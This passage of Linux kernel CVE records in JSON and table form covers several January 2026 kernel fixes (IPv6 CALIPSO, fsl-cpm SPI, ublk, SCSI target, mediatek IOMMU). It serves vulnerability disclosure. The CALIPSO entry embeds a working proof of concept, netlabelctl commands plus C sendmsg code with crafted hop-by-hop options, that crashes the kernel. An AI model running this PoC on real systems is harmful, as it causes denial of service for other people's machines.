"status": "affected",
"version": "2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3",
"versionType": "git"
},
{
"lessThan": "73744ad5696dce0e0f43872aba8de6a83d6ad570",
"status": "affected",
"version": "2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3",
"versionType": "git"
},
{
"lessThan": "58fc7342b529803d3c221101102fe913df7adb83",
"status": "affected",
"version": "2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/ipv6/calipso.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.8"
},
{
"lessThan": "4.8",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc4",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc4",
"versionStartIncluding": "4.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom \u003e INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n netlabelctl map del default\n netlabelctl calipso add pass doi:7\n netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n Then run the following PoC:\n\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n // setup msghdr\n int cmsg_size = 2;\n int cmsg_len = 0x60;\n struct msghdr msg;\n struct sockaddr_in6 dest_addr;\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\n sizeof(struct cmsghdr) + cmsg_len);\n msg.msg_name = \u0026dest_addr;\n msg.msg_namelen = sizeof(dest_addr);\n msg.msg_iov = NULL;\n msg.msg_iovlen = 0;\n msg.msg_control = cmsg;\n msg.msg_controllen = cmsg_len;\n msg.msg_flags = 0;\n\n // setup sockaddr\n dest_addr.sin6_family = AF_INET6;\n dest_addr.sin6_port = htons(31337);\n dest_addr.sin6_flowinfo = htonl(31337);\n dest_addr.sin6_addr = in6addr_loopback;\n dest_addr.sin6_scope_id = 31337;\n\n // setup cmsghdr\n cmsg-\u003ecmsg_len = cmsg_len;\n cmsg-\u003ecmsg_level = IPPROTO_IPV6;\n cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n sendmsg(fd, \u0026msg, 0);"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:48.500Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/86f365897068d09418488165a68b23cb5baa37f2"
},
{
"url": "https://git.kernel.org/stable/c/6b7522424529556c9cbc15e15e7bd4eeae310910"
},
{
"url": "https://git.kernel.org/stable/c/2bb759062efa188ea5d07242a43e5aa5464bbae1"
},
{
"url": "https://git.kernel.org/stable/c/c53aa6a5086f03f19564096ee084a202a8c738c0"
},
{
"url": "https://git.kernel.org/stable/c/bf3709738d8a8cc6fa275773170c5c29511a0b24"
},
{
"url": "https://git.kernel.org/stable/c/73744ad5696dce0e0f43872aba8de6a83d6ad570"
},
{
"url": "https://git.kernel.org/stable/c/58fc7342b529803d3c221101102fe913df7adb83"
}
],
"title": "ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71085",
"datePublished": "2026-01-13T15:34:48.324Z",
"dateReserved": "2026-01-13T15:30:19.649Z",
"dateUpdated": "2026-01-19T12:19:48.500Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68773 (GCVE-0-2025-68773)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:28 – Updated: 2026-01-19 12:18
VLAI?
EPSS
Title
spi: fsl-cpm: Check length parity before switching to 16 bit mode
Summary
In the Linux kernel, the following vulnerability has been resolved:
spi: fsl-cpm: Check length parity before switching to 16 bit mode
Commit fc96ec826bce ("spi: fsl-cpm: Use 16 bit mode for large transfers
with even size") failed to make sure that the size is really even
before switching to 16 bit mode. Until recently the problem went
unnoticed because kernfs uses a pre-allocated bounce buffer of size
PAGE_SIZE for reading EEPROM.
But commit 8ad6249c51d0 ("eeprom: at25: convert to spi-mem API")
introduced an additional dynamically allocated bounce buffer whose size
is exactly the size of the transfer, leading to a buffer overrun in
the fsl-cpm driver when that size is odd.
Add the missing length parity verification and remain in 8 bit mode
when the length is not even.
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
60afe299bb541a928ba39bcb4ae8d3e428d1c5a5 , < c8f1d35076b78df61ace737e41cc1f4b7b63236c
(git)
Affected: 4badd33929c05ed314794b95f1af1308f7222be8 , < 9c34a4a2ead00979d203a8c16bea87f0ef5291d8 (git) Affected: 7f6738e003b364783f3019fdf6e7645bc8dd1643 , < 837a23a11e0f734f096c7c7b0778d0e625e3dc87 (git) Affected: fc96ec826bced75cc6b9c07a4ac44bbf651337ab , < 3dd6d01384823e1bd8602873153d6fc4337ac4fe (git) Affected: fc96ec826bced75cc6b9c07a4ac44bbf651337ab , < 743cebcbd1b2609ec5057ab474979cef73d1b681 (git) Affected: fc96ec826bced75cc6b9c07a4ac44bbf651337ab , < be0b613198e6bfa104ad520397cab82ad3ec1771 (git) Affected: fc96ec826bced75cc6b9c07a4ac44bbf651337ab , < 1417927df8049a0194933861e9b098669a95c762 (git) Affected: 42c04316d9275ec267d36e5e9064cd56c9884148 (git) Affected: dc120f2d35b030390a2bc0f94dd5f37e900cae91 (git) Affected: b558275c1b040f0e5aa56c862241f9212b6118c3 (git) Affected: b9d9e8856f1c83e4277403f9b4c369b322ebcb12 (git) Affected: 36a6d0f66c874666caf4e8be155b1be30f6231be (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/spi/spi-fsl-spi.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "c8f1d35076b78df61ace737e41cc1f4b7b63236c",
"status": "affected",
"version": "60afe299bb541a928ba39bcb4ae8d3e428d1c5a5",
"versionType": "git"
},
{
"lessThan": "9c34a4a2ead00979d203a8c16bea87f0ef5291d8",
"status": "affected",
"version": "4badd33929c05ed314794b95f1af1308f7222be8",
"versionType": "git"
},
{
"lessThan": "837a23a11e0f734f096c7c7b0778d0e625e3dc87",
"status": "affected",
"version": "7f6738e003b364783f3019fdf6e7645bc8dd1643",
"versionType": "git"
},
{
"lessThan": "3dd6d01384823e1bd8602873153d6fc4337ac4fe",
"status": "affected",
"version": "fc96ec826bced75cc6b9c07a4ac44bbf651337ab",
"versionType": "git"
},
{
"lessThan": "743cebcbd1b2609ec5057ab474979cef73d1b681",
"status": "affected",
"version": "fc96ec826bced75cc6b9c07a4ac44bbf651337ab",
"versionType": "git"
},
{
"lessThan": "be0b613198e6bfa104ad520397cab82ad3ec1771",
"status": "affected",
"version": "fc96ec826bced75cc6b9c07a4ac44bbf651337ab",
"versionType": "git"
},
{
"lessThan": "1417927df8049a0194933861e9b098669a95c762",
"status": "affected",
"version": "fc96ec826bced75cc6b9c07a4ac44bbf651337ab",
"versionType": "git"
},
{
"status": "affected",
"version": "42c04316d9275ec267d36e5e9064cd56c9884148",
"versionType": "git"
},
{
"status": "affected",
"version": "dc120f2d35b030390a2bc0f94dd5f37e900cae91",
"versionType": "git"
},
{
"status": "affected",
"version": "b558275c1b040f0e5aa56c862241f9212b6118c3",
"versionType": "git"
},
{
"status": "affected",
"version": "b9d9e8856f1c83e4277403f9b4c369b322ebcb12",
"versionType": "git"
},
{
"status": "affected",
"version": "36a6d0f66c874666caf4e8be155b1be30f6231be",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/spi/spi-fsl-spi.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.4"
},
{
"lessThan": "6.4",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "5.10.181",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "5.15.114",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "6.1.29",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "6.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "6.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "6.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.14.316",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.19.284",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.4.244",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.2.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.3.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nspi: fsl-cpm: Check length parity before switching to 16 bit mode\n\nCommit fc96ec826bce (\"spi: fsl-cpm: Use 16 bit mode for large transfers\nwith even size\") failed to make sure that the size is really even\nbefore switching to 16 bit mode. Until recently the problem went\nunnoticed because kernfs uses a pre-allocated bounce buffer of size\nPAGE_SIZE for reading EEPROM.\n\nBut commit 8ad6249c51d0 (\"eeprom: at25: convert to spi-mem API\")\nintroduced an additional dynamically allocated bounce buffer whose size\nis exactly the size of the transfer, leading to a buffer overrun in\nthe fsl-cpm driver when that size is odd.\n\nAdd the missing length parity verification and remain in 8 bit mode\nwhen the length is not even."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:18:53.693Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/c8f1d35076b78df61ace737e41cc1f4b7b63236c"
},
{
"url": "https://git.kernel.org/stable/c/9c34a4a2ead00979d203a8c16bea87f0ef5291d8"
},
{
"url": "https://git.kernel.org/stable/c/837a23a11e0f734f096c7c7b0778d0e625e3dc87"
},
{
"url": "https://git.kernel.org/stable/c/3dd6d01384823e1bd8602873153d6fc4337ac4fe"
},
{
"url": "https://git.kernel.org/stable/c/743cebcbd1b2609ec5057ab474979cef73d1b681"
},
{
"url": "https://git.kernel.org/stable/c/be0b613198e6bfa104ad520397cab82ad3ec1771"
},
{
"url": "https://git.kernel.org/stable/c/1417927df8049a0194933861e9b098669a95c762"
}
],
"title": "spi: fsl-cpm: Check length parity before switching to 16 bit mode",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68773",
"datePublished": "2026-01-13T15:28:50.686Z",
"dateReserved": "2025-12-24T10:30:51.035Z",
"dateUpdated": "2026-01-19T12:18:53.693Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68823 (GCVE-0-2025-68823)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-13 15:29
VLAI?
EPSS
Title
ublk: fix deadlock when reading partition table
Summary
In the Linux kernel, the following vulnerability has been resolved:
ublk: fix deadlock when reading partition table
When one process(such as udev) opens ublk block device (e.g., to read
the partition table via bdev_open()), a deadlock[1] can occur:
1. bdev_open() grabs disk->open_mutex
2. The process issues read I/O to ublk backend to read partition table
3. In __ublk_complete_rq(), blk_update_request() or blk_mq_end_request()
runs bio->bi_end_io() callbacks
4. If this triggers fput() on file descriptor of ublk block device, the
work may be deferred to current task's task work (see fput() implementation)
5. This eventually calls blkdev_release() from the same context
6. blkdev_release() tries to grab disk->open_mutex again
7. Deadlock: same task waiting for a mutex it already holds
The fix is to run blk_update_request() and blk_mq_end_request() with bottom
halves disabled. This forces blkdev_release() to run in kernel work-queue
context instead of current task work context, and allows ublk server to make
forward progress, and avoids the deadlock.
[axboe: rewrite comment in ublk]
Severity ?
No CVSS data available.
Assigner
References
Impacted products
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/block/ublk_drv.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "0460e09a614291f06c008443f47393c37b7358e7",
"status": "affected",
"version": "71f28f3136aff5890cd56de78abc673f8393cad9",
"versionType": "git"
},
{
"lessThan": "c258f5c4502c9667bccf5d76fa731ab9c96687c1",
"status": "affected",
"version": "71f28f3136aff5890cd56de78abc673f8393cad9",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/block/ublk_drv.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.0"
},
{
"lessThan": "6.0",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "6.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nublk: fix deadlock when reading partition table\n\nWhen one process(such as udev) opens ublk block device (e.g., to read\nthe partition table via bdev_open()), a deadlock[1] can occur:\n\n1. bdev_open() grabs disk-\u003eopen_mutex\n2. The process issues read I/O to ublk backend to read partition table\n3. In __ublk_complete_rq(), blk_update_request() or blk_mq_end_request()\n runs bio-\u003ebi_end_io() callbacks\n4. If this triggers fput() on file descriptor of ublk block device, the\n work may be deferred to current task\u0027s task work (see fput() implementation)\n5. This eventually calls blkdev_release() from the same context\n6. blkdev_release() tries to grab disk-\u003eopen_mutex again\n7. Deadlock: same task waiting for a mutex it already holds\n\nThe fix is to run blk_update_request() and blk_mq_end_request() with bottom\nhalves disabled. This forces blkdev_release() to run in kernel work-queue\ncontext instead of current task work context, and allows ublk server to make\nforward progress, and avoids the deadlock.\n\n[axboe: rewrite comment in ublk]"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:29:25.392Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/0460e09a614291f06c008443f47393c37b7358e7"
},
{
"url": "https://git.kernel.org/stable/c/c258f5c4502c9667bccf5d76fa731ab9c96687c1"
}
],
"title": "ublk: fix deadlock when reading partition table",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68823",
"datePublished": "2026-01-13T15:29:25.392Z",
"dateReserved": "2025-12-24T10:30:51.048Z",
"dateUpdated": "2026-01-13T15:29:25.392Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68782 (GCVE-0-2025-68782)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:28 – Updated: 2026-01-19 12:18
VLAI?
EPSS
Title
scsi: target: Reset t_task_cdb pointer in error case
Summary
In the Linux kernel, the following vulnerability has been resolved:
scsi: target: Reset t_task_cdb pointer in error case
If allocation of cmd->t_task_cdb fails, it remains NULL but is later
dereferenced in the 'err' path.
In case of error, reset NULL t_task_cdb value to point at the default
fixed-size buffer.
Found by Linux Verification Center (linuxtesting.org) with SVACE.
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
9e95fb805dc043cc8ed878a08d1583e4097a5f80 , < 6cac97b12bdab04832e0416d049efcd0d48d303b
(git)
Affected: 9e95fb805dc043cc8ed878a08d1583e4097a5f80 , < 45fd86b444105c8bd07a763f58635c87e5dc7aea (git) Affected: 9e95fb805dc043cc8ed878a08d1583e4097a5f80 , < 8727663ded659aad55eef21e3864ebf5a4796a96 (git) Affected: 9e95fb805dc043cc8ed878a08d1583e4097a5f80 , < 0260ad551b0815eb788d47f32899fbcd65d6f128 (git) Affected: 9e95fb805dc043cc8ed878a08d1583e4097a5f80 , < 0d36db68fdb8a3325386fd9523b67735f944e1f3 (git) Affected: 9e95fb805dc043cc8ed878a08d1583e4097a5f80 , < 8edbb9e371af186b4cf40819dab65fafe109df4d (git) Affected: 9e95fb805dc043cc8ed878a08d1583e4097a5f80 , < 5053eab38a4c4543522d0c320c639c56a8b59908 (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/target/target_core_transport.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "6cac97b12bdab04832e0416d049efcd0d48d303b",
"status": "affected",
"version": "9e95fb805dc043cc8ed878a08d1583e4097a5f80",
"versionType": "git"
},
{
"lessThan": "45fd86b444105c8bd07a763f58635c87e5dc7aea",
"status": "affected",
"version": "9e95fb805dc043cc8ed878a08d1583e4097a5f80",
"versionType": "git"
},
{
"lessThan": "8727663ded659aad55eef21e3864ebf5a4796a96",
"status": "affected",
"version": "9e95fb805dc043cc8ed878a08d1583e4097a5f80",
"versionType": "git"
},
{
"lessThan": "0260ad551b0815eb788d47f32899fbcd65d6f128",
"status": "affected",
"version": "9e95fb805dc043cc8ed878a08d1583e4097a5f80",
"versionType": "git"
},
{
"lessThan": "0d36db68fdb8a3325386fd9523b67735f944e1f3",
"status": "affected",
"version": "9e95fb805dc043cc8ed878a08d1583e4097a5f80",
"versionType": "git"
},
{
"lessThan": "8edbb9e371af186b4cf40819dab65fafe109df4d",
"status": "affected",
"version": "9e95fb805dc043cc8ed878a08d1583e4097a5f80",
"versionType": "git"
},
{
"lessThan": "5053eab38a4c4543522d0c320c639c56a8b59908",
"status": "affected",
"version": "9e95fb805dc043cc8ed878a08d1583e4097a5f80",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/target/target_core_transport.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.8"
},
{
"lessThan": "5.8",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "5.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: target: Reset t_task_cdb pointer in error case\n\nIf allocation of cmd-\u003et_task_cdb fails, it remains NULL but is later\ndereferenced in the \u0027err\u0027 path.\n\nIn case of error, reset NULL t_task_cdb value to point at the default\nfixed-size buffer.\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:18:59.574Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/6cac97b12bdab04832e0416d049efcd0d48d303b"
},
{
"url": "https://git.kernel.org/stable/c/45fd86b444105c8bd07a763f58635c87e5dc7aea"
},
{
"url": "https://git.kernel.org/stable/c/8727663ded659aad55eef21e3864ebf5a4796a96"
},
{
"url": "https://git.kernel.org/stable/c/0260ad551b0815eb788d47f32899fbcd65d6f128"
},
{
"url": "https://git.kernel.org/stable/c/0d36db68fdb8a3325386fd9523b67735f944e1f3"
},
{
"url": "https://git.kernel.org/stable/c/8edbb9e371af186b4cf40819dab65fafe109df4d"
},
{
"url": "https://git.kernel.org/stable/c/5053eab38a4c4543522d0c320c639c56a8b59908"
}
],
"title": "scsi: target: Reset t_task_cdb pointer in error case",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68782",
"datePublished": "2026-01-13T15:28:56.929Z",
"dateReserved": "2025-12-24T10:30:51.036Z",
"dateUpdated": "2026-01-19T12:18:59.574Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71071 (GCVE-0-2025-71071)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:31 – Updated: 2026-01-13 15:31
VLAI?
EPSS
Title
iommu/mediatek: fix use-after-free on probe deferral
Summary
In the Linux kernel, the following vulnerability has been resolved:
iommu/mediatek: fix use-after-free on probe deferral
The driver is dropping the references taken to the larb devices during
probe after successful lookup as well as on errors. This can
potentially lead to a use-after-free in case a larb device has not yet
been bound to its driver so that the iommu driver probe defers.
Fix this by keeping the references as expected while the iommu driver is
bound.
Severity ?
No CVSS data available.
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Affected:
8412e5dd24ffc8bc21a00bfaa0b80d4596cdc9da , < 896ec55da3b90bdb9fc04fedc17ad8c359b2eee5
(git)
